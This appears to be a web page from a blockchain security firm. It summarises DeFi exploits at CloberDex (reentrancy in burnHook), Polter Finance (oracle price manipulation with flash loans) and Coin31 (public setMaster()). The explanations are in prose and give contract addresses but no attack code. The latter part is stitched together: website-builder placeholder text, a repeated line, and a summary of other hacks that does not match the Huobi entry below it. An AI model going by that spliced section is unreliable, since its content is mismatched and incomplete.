Polter’s $12M Oracle Exploit, CloberDex’s Reentrancy, and Coin31’s Access Control Failure
Polter Finance lost $12M when its oracle overvalued 1 BOO token at $1.37T, letting the attacker drain lending pools. CloberDex suffered a $514K loss due to a reentrancy flaw in its burnHook logic. Coin31 was drained for $26K after a public setMaster() function allowed unauthorized contract control.
In Brief
A reentrancy flaw caused CloberDex a $514K loss.
Polter Finance suffered a $12M price manipulation attack.
Coin31’s access control vulnerability resulted in a $26K loss.
Hacks Analysis
CloberDex | Amount Lost: $514K
On December 10th, the CloberDex exploit on the Base network resulted in a $514K loss. The root cause of the exploit was a reentrancy vulnerability in the _burn() function of the Rebalancer contract. The problem was that the burnHook function was executed before updating pool.reserveA and pool.reserveB. This allowed the attacker to reenter the function and repeatedly withdraw inflated amounts based on outdated reserve values. The CloberDEX team has acknowledged the incident and paused all transactions.
Press enter or click to view image in full size
Exploited Contract (on Base): 0x6a0b87d6b74f7d5c92722f6a11714dbeda9f3895
Private Contract with burnHook function: 0x32Fb1BedD95BF78ca2c6943aE5AEaEAAFc0d97C1
On November 16th, the Polter Finance exploit on the Fantom network resulted in a $12M loss. The attacker used flash loans to manipulate SpookySwap’s liquidity pools, inflating the BOO token price. They deposited 1 BOO as collateral, which the oracle incorrectly valued at $1.37 trillion. Using this overvalued collateral, the attacker borrowed 9.1M wFTM, draining the protocol’s lending pool. The latestRoundData() function of the oracle failed to detect price spikes which allowed the manipulated price to pass as valid.
Press enter or click to view image in full size
Press enter or click to view image in full size
BOO Token (on Fantom): 0x841fad6eae12c286d1fd18d1d525dffa75c7effe
On November 2nd, the Coin31 exploit on the BNB chain resulted in a $26K loss. The root cause of the attack was the absence of access control in the setMaster() function of the token contract. The attacker called the function to set the master address to their own contract, granting themselves control over the Coin31 token pool. This allowed the attacker to drain tokens from the pool and profit. The Coin31 team has acknowledged the incident.
Press enter or click to view image in full size
Press enter or click to view image in full size
Exploited Contract (on BNB): 0x52fbd9a94587f8ce757d1bd0a89abfe8d6233591
The rich text element allows you to create and format headings, paragraphs, blockquotes, images, and video all in one place instead of having to add and format them individually. Just double-click and easily create content.
A rich text element can be used with static or dynamic content. For static content, just drop it into any page and begin editing. For dynamic content, add a rich text field to any collection and then connect a rich text element to that field in the settings panel. Voila!
Headings, paragraphs, blockquotes, figures, images, and figure captions can all be styled after a class is added to the rich text element using the "When inside of" nested selector system.
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
Follow-up: Conduct a follow-up review to ensure that the remediation steps were effective and that the smart contract is now secure.
In Brief
Remitano suffered a $2.7M loss due to a private key compromise.
GAMBL’s recommendation system was exploited.
DAppSocial lost $530K due to a logic vulnerability.
Rocketswap’s private keys were inadvertently deployed on the server.
Hacks
Hacks Analysis
Huobi | Amount Lost: $8M
On September 24th, the Huobi Global exploit on the Ethereum Mainnet resulted in a $8 million loss due to the compromise of private keys. The attacker executed the attack in a single transaction by sending 4,999 ETH to a malicious contract. The attacker then created a second malicious contract and transferred 1,001 ETH to this new contract. Huobi has since confirmed that they have identified the attacker and has extended an offer of a 5% white hat bounty reward if the funds are returned to the exchange.
